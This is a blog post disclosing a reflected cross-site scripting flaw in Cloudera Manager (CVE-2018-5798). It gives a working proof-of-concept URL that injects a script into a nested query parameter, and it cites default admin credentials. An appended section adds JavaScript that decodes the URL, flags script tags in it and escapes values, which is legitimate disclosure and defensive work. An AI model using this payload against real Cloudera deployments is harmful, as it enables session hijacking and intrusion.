Mar 23 2025

CVE-2018-5798 – Cross-site scripting vulnerability in Cloudera Manager – Part 2


Author: Shafeeque Olassery Kunnikkal | Category: Cross Site Scripting, CVE-2018-5798, Cyber Security

Below are the details of the reflected XSS I found in Cloudera Enterprise. More details can be found here: https://www.cloudera.com/documentation/other/securitybulletins/topics/Security-Bulletin.html#DOCS-3186

Log in to Cloudera Manager using the credentials
admin:admin

1. Navigate to the following URL, which includes the XSS payload.

[Image: xss]

2. Navigate to the following URL in a browser after logging in to Cloudera Manager, using these credentials for login: admin:admin

http://localhost:7180/cmf/config2/dialog?metadataUrl=%2fcmf%2fclusters%2f1%2fsearchConfig%2fmetadata.json%3fserviceDep%3dtrue%26q%3dspark_on_yarn%3C%2fscript%3E%3Cscript%3Ealert%28%27reflected%20xss%27%29%3C%2fscript%3E

You will see the XSS payload executed, as shown in the image below.

[Image: XSS]
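An added example, not from the original post or from Cloudera's code: it decodes the PoC URL layer by layer to show that the payload sits in the `q` parameter nested inside `metadataUrl`, flags script tags in nested parameters the way a log-side check could, and escapes a value for an inline script block. That the value is reflected inside an inline `<script>` is an assumption drawn from the payload's leading `</script>`; the templates and function names are hypothetical.

```javascript
// PoC URL exactly as given in the post.
const POC_URL = "http://localhost:7180/cmf/config2/dialog?metadataUrl=%2fcmf%2fclusters%2f1%2fsearchConfig%2fmetadata.json%3fserviceDep%3dtrue%26q%3dspark_on_yarn%3C%2fscript%3E%3Cscript%3Ealert%28%27reflected%20xss%27%29%3C%2fscript%3E";

// Flatten query parameters, recursing into values that carry their own query
// string (metadataUrl here), so the nested "q" is inspected too.
function flattenParams(urlString, depth = 0, prefix = "") {
  let url;
  try { url = new URL(urlString, "http://placeholder.invalid"); } catch { return []; }
  const out = [];
  for (const [name, value] of url.searchParams) {
    out.push({ path: prefix + name, value });
    if (depth < 3 && value.includes("?")) {
      out.push(...flattenParams(value, depth + 1, prefix + name + " > "));
    }
  }
  return out;
}

// Detection: parameter paths whose decoded value contains a script tag.
const SCRIPT_TAG = /<\s*\/?\s*script\b/i;
function findScriptBreakouts(urlString) {
  return flattenParams(urlString).filter(p => SCRIPT_TAG.test(p.value)).map(p => p.path);
}

// Mitigation: JSON.stringify alone leaves "</script>" intact, so also escape
// <, >, & and U+2028/U+2029 before writing a value into an inline script.
function toInlineScriptLiteral(value) {
  return JSON.stringify(value).replace(/[<>&\u2028\u2029]/g,
    c => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Hypothetical templates (assumption: the post does not show the real one).
const renderNaive = q => `<script>var query = "${q}";</script>`;
const renderHardened = q => `<script>var query = ${toInlineScriptLiteral(q)};</script>`;

// Decoded nested "q" value from the PoC, then both renderings side by side.
const pocQuery = flattenParams(POC_URL).find(p => p.path === "metadataUrl > q").value;
console.log(findScriptBreakouts(POC_URL));
console.log(renderNaive(pocQuery));
console.log(renderHardened(pocQuery));
```

The naive rendering contains two opening script tags, so the HTML parser ends the first block early; the hardened rendering contains one, and the literal still evaluates to the original string.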
